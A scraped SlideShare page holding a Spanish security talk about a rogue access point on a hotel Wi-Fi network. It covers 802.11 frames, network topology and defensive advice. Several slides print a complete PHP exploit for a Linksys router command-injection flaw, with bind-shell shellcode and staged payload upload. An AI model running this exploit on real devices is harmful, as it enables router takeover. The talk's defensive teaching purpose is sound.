guía de registro de slideshare por Brayan JosephBRAYANJOSEPHPEREZGOM
 

Último (20)

La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafios
 
Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024
 
Hernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxHernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptx
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)
 
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdftrabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdf
 
ejercicios pseint para aprogramacion sof
ejercicios pseint para aprogramacion sofejercicios pseint para aprogramacion sof
ejercicios pseint para aprogramacion sof
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx
 
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
 
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docx
 
Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...
Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...
Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...
 
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE  DE TECNOLOGIA E INFORMATICA PRIMARIACLASE  DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
 
KELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesKELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento Protégeles
 
SalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 TestcontainersSalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 Testcontainers
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdf
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidad
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Joseph
 

El caso de la habitacion 1020

  • 1.
  • 2. Disclaimer ● La ponencia que estas a punto de presenciar en carácter técnico y educativo. ● Esta presentacion y su contenido fueron realizados con intenciones educativas basandose en un incidente de seguridad documentado con autorización de las partes potencialmente afectadas. ● He preferido mantener en anonimidad la entidad afectada por lo que los nombres mencionados (si aplica) no deben ser tomados como reales. ● No me hago responsable del uso malintencionado que se le pueda dar a la informacion brindada. ● Ninguno de mis clientes o empleadores tienen conocimiento específico ni colaboraron, de manera directa o indirecta, con la investigación ni el analisis que será presentado. Enjoy the ride :)
  • 3. ¿De qué va esta exposición? ● Contexto ● Monitorización de un ataque potencial. ● Especulaciones varias. ● Reconocimiento y encapsulación del espectro de ataque. ● Medidas contraofensivas. ● Especulación e hipótesis sobre el esquema de red. ● Topologias de escenario posibles. ● Reflexiones varias. ● Contramedidas preventivas.
  • 4.
  • 7.
  • 8.
  • 9.
  • 10.
  • 11.
  • 12.
  • 13. ¿? ● 2 SSID's “HOJO” y 1 SSID “Cisco42618” ● “Fake” HOJO y Cisco42618 comparten segmento LAN 192.168.1.0 /24 El otro HOJO entrega 192.168.103.0 /24 ● Sobre los dos que comparten IP publica (Y) recibo el mismo escaneo del puertos... ● “Gateway” LAN (192.168.1.1) sniffeando puertos ... ● Mac address TPLink ?!?!
  • 14.
  • 15. Tramas IEEE 801.11 Estructura Encabezado MAC : Frame control, version de protocolo, tipo de trama, BSSID, Origen y Desitino (30 Bytes) Payload: Data o posible información contenida en las tramas de management (0 – 2312 Bytes) FCS: Frame Check Sequence. Verifica la integridad. Cierra la trama con un calculo de redundancia cliclica cuyo resultado debe ser de la suma del encabezado MAC y el Payload (4 Bytes) Tipos Control Frame: Permite el intercambio de infomacion. RTS, CTS, ACK. Permite una mejor coordinacion entre el uso compartido y el espectro disponible Data: Payload, contiene los paquetes TCP o UDP. Como el limite es de 2312 posiblemente sean fragmentados. Management: Permiten encontrar otros AP y proveen la posibilidad de conectarte y desconectarte de un punto de acceso Management Frames. Beacons Probes Association Authentication
  • 16.
  • 20.
  • 21.
  • 22. “Alguien parece estar duplicando el SSID de la red del hotel y abriendo acceso a una red intervenida”
  • 23.
  • 24. Voy a anotarlo en mi maquina de escribir invisible...
  • 25.
  • 26. - Declaracion del encargado de no pertenencia del dispositivo: Check - Verificacion de uso mal intencionado del standard IEEE 802.11g,n: Check - Falta de dinero para salir de bares esa noche: Check
  • 27.
  • 28.
  • 29.
  • 30.
  • 31.
  • 32.
  • 33. 'Author' => [ 'Johannes Ullrich', #worm discovery 'Rew', # original exploit 'infodox', # another exploit 'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module 'juan vazquez' # minor help with msf module
  • 34. error_reporting(0); $host = "192.168.1.1"; // IP objetivo $port = "8080"; // Puerto objetivo $vuln = "tmUnblock.cgi"; // hndUnblock.cgi tambien es vulnerable // msfpayload linux/mipsle/shell_bind_tcp LPORT=4444 X $shellcode = base64_decode( "f0VMRgEBAQAAAAAAAAAAAAIACAABAAAAVABAADQAAAAAAAAAAA". "AAADQAIAABAAAAAAAAAAEAAAAAAAAAAABAAAAAQAB7AQAAogIA". "AAcAAAAAEAAA4P+9J/3/DiQnIMABJyjAAf//BihXEAIkDAEBAV". "BzDyT//1Aw7/8OJCdwwAERXA0kBGjNAf/9DiQncMABJWiuAeD/". "ra/k/6Cv6P+gr+z/oK8lIBAC7/8OJCcwwAHg/6UjSRACJAwBAQ". "FQcw8kJSAQAgEBBSROEAIkDAEBAVBzDyQlIBAC//8FKP//BihI". "EAIkDAEBAVBzDyT//1AwJSAQAv3/DyQnKOAB3w8CJAwBAQFQcw". "8kJSAQAgEBBSjfDwIkDAEBAVBzDyQlIBAC//8FKN8PAiQMAQEB". "UHMPJFBzBiT//9AEUHMPJP//BijH/w8kJ3jgASEg7wPw/6Sv9P". "+gr/f/DiQncMABIWDvAyFojgH//6Ct8P+lI6sPAiQMAQEBL2Jp". "bi9zaA==" );
  • 35. // Usar la funcion urlencode() rompe el exploit. function full_urlencode($string) { $ret = ""; for($c=0; $c<strlen($string); $c++) { if($string[$c] != '&') $ret .= "%".dechex(ord($string[$c])); else $ret .= "&"; } return $ret;
  • 36. // Si se usa wget se necesitaria que el payload sea accesible por el puerto 80 en la maquina del atacante. La mejor solución es escribir manualmente el ejecutable con "echo -en", pero httpd crashea con strings largos, asi que lo vamos a usar igual pero hay que armarlo por partes :) // en caso que hayamos tenido una falla previa de ejecucion. $cleanup = build_packet($host, $port, $vuln, "rm /tmp/c0d3z"); if(!send_packet($host, $port, $cleanup)) die("failn"); else echo "listortin"; //Escribimos el payload en stages de 20 bytes for($i=0; $i<strlen($shellcode); $i+=20) { echo "tSending ".$i."/".strlen($shellcode)." bytes... "; $cmd = "echo -en '"; for($c=$i; $c<$i+20 && $c<strlen($shellcode); $c++) { $cmd .= "0".decoct(ord($shellcode[$c])); } $cmd .= "' >> /tmp/c0d3z"; $cmd = build_packet($host, $port, $vuln, $cmd); if(!send_packet($host, $port, $cmd)) die("failn"); else echo "sent!n"; usleep(100000); }
  • 37. // Lo hacemos ejecutable echo "tConfiguranding... "; $config = build_packet($host, $port, $vuln, "chmod a+rwx /tmp/c0d3z"); if(!send_packet($host, $port, $config)) die("failn"); else echo "done!n"; } // Agregamos los ingredientes HTTP necesarios. function build_packet($host, $port, $vuln, $payload) { $exploit = full_urlencode( "submit_button=&". "change_action=&". "submit_type=&". "action=&". "commit=0&". "ttcp_num=2&". "ttcp_size=2&". "ttcp_ip=-h `".$payload."`&". "StartEPI=1" );
  • 38. $packet = "POST /".$vuln." HTTP/1.1rn". "Host: ".$host."rn". // Este usuario y contraseña no se chequean ;) "Authorization: Basic ".base64_encode("admin:cualquiercosa")."rn". "Content-Type: application/x-www-form-urlencodedrn". "Content-Length: ".strlen($exploit)."rn". "rn". $exploit; return $packet; } function send_packet($host, $port, $packet) { $socket = fsockopen($host, $port, $errno, $errstr); if(!$socket) return false; if(!fwrite($socket, $packet)) return false; fclose($socket); return true; }
  • 39. echo "Testeando conexión con el target... "; $socket = fsockopen($host, $port, $errno, $errstr, 30); if(!$socket) die("failn"); else echo "connected!n"; fclose($socket); echo "Sending payload... n"; build_payload($host, $port, $vuln, $shellcode); Sleep(3); // Despacito despacito.... echo "Ejecutando el payload... "; if(!send_packet($host, $port, build_packet($host, $port, $vuln, "/tmp/c0d3z"))) die("failn"); else echo "done!n"; Sleep(3); // Despacito despacito... echo "Intento de conexión hacia una shell... "; $socket = fsockopen($host, 4444, $errno, $errstr, 30); if(!$socket) die("failn"); else echo "connected!n"; echo "Abriendo shell... n"; while(!feof($socket)) { $cmd = readline($host."$ "); if(!empty($cmd)) readline_add_history($cmd); //Se llega al output. fwrite($socket, $cmd.";echo xxxEOFxxxn"); $data = ""; do { $data .= fread($socket, 1); } while(strpos($data, "xxxEOFxxx") === false && !feof($socket)); echo str_replace("xxxEOFxxx", "", $data); } ?>
  • 40.
  • 42.
  • 43.
  • 44.
  • 45.
  • 46.
  • 47.
  • 48.
  • 49.
  • 50.
  • 51.
  • 52.
  • 53.
  • 54.
  • 56.
  • 57. Man in the Middle Attack. 10.10.0.1 /24 10.10.0.100 /24 |------------------------- [192.168.1.0 /24] –---------------------------| Pública Linksys E1200 (Router AP)
  • 58.
  • 59.
  • 60. ¿Quien es el DHCP?
  • 61.
  • 62.
  • 63.
  • 64.
  • 65.
  • 66.
  • 67.
  • 68.
  • 69.
  • 70.
  • 72.
  • 73. LA BOCA DEL TELEFONO IP !!!!
  • 74.
  • 75. Vamo' a sacar conslusione'
  • 76. ● Los telefonos no se ven en las capturas por lo que deberian haber estado en otra vlan. ● El switch tiene como gateway el router Cisco “sospechoso” por lo que, si era propiedad del hotel, pudo ser manipulado post explotacion o deliberadamente propiedad del/los atacante/s. --- ● El router Cisco es propiedad del atacante. ● Las bocas telefonicas proveen direcciones dentro del pool 192.168.1.0/24 por lo que tanto el dispositivo atacante como el switch y el servidor de telefonia tienen que compartir Vlan de gestion. LA NATIVA! Lo cual les da acceso a la red de gestion del servidor de telefonía. ● El tema ahora es: El switch en la frontera del servidor contra la patchera hacia los telefonos no se ve en las capturas, por lo que debe forwardear la vlan nativa y no tener IP de administracion en la misma sino en otra vlan.
  • 78.
  • 79.
  • 81. ¿Que se puede sacar de todo esto?
  • 82. ● Un Portal Cautivo no es un método que provea un mecanismo de seguridad para el usuario aunque “prevenga” el acceso web. La autenticación ya fué realizada sin cifrado previo. ● La Vlan nativa no tiene que ser propagada por los troncales y mucho menos contener el segmento de administración de equipos de infraestructura de red. ● Se deben considerar en ambientes expuestos políticas de cantidad de mac addresses por puerto (port-security), dhcp snooping y ARP Inspection. ● Los individuos/companías que consideren que su información es valiosa tienen que optar por métodos de cifrado y autenticación robustos. WPA/WPA2 en casos particulares con contraseñas fuertes y el ideal WPA/WPA2 Enterprise con 802.1X y un servidor Radius y AD seguros son una buen arranque perimetral. ● Vlan Profiling, IDS, IPS y/o NAC para reforzar los accesos. El BYOD ya llegó :) ● Los equipos de distribución y acceso deben contar con contraseñas robustas y nunca las que vienen por defecto. Reforzar los accesos con certificados y llaves RSA. ● Buena politica de ACL's inter-VLAN. ● Los equipos de comunicaciones deben ser renovados y actualizados a nivel de versión o configuración si se considera que pueden estar expuestos a una vulnerabilidad publicada. ● No hay que realizar ataques mal intencionados. Y si existe algo peor que eso es hacerlo con herramientas vulnerables.
  • 83. ● Mantener el software del dispositivo/computadora y antivirus actualizado. ● Prestar atención a alertas de sitios maliciosos y errores de certificado. Navegar con conciencia :) ● Desactivar la conexion automática a redes conocidas. No conozco los pasos de todos los telefonos. Googleen! :D ● Identificar patrones de ataque: Muchas redes cercanas con autenticación abierta, sitios web sin HTTPS.
  • 84. ● Googlear el modelo de tu router acerca de posibles vulnerabilidades remotas o locales y configurar adecuadamente, actualizar o renovar el equipo. ● Bloquear el acceso remoto a la gestion web.
  • 85. Y por ultimo ● Utilizar siempre WPA o WPA2 con contraseñas complejas (números, mayúsculas, minúsculas, simbolos). Evitar involucrar numeros de documento, telefono, libreta, pasaporte, patente del auto, fechas de nacimiento. En muchos casos esta información ya es de dominio público. Esto solo evita el ataque por fuerza bruta. ● Utilizar el criterio con los correos electrónicos y elementos compartidos en redes sociales de gente que no es de confianza (y de confianza tambien!).
  • 86.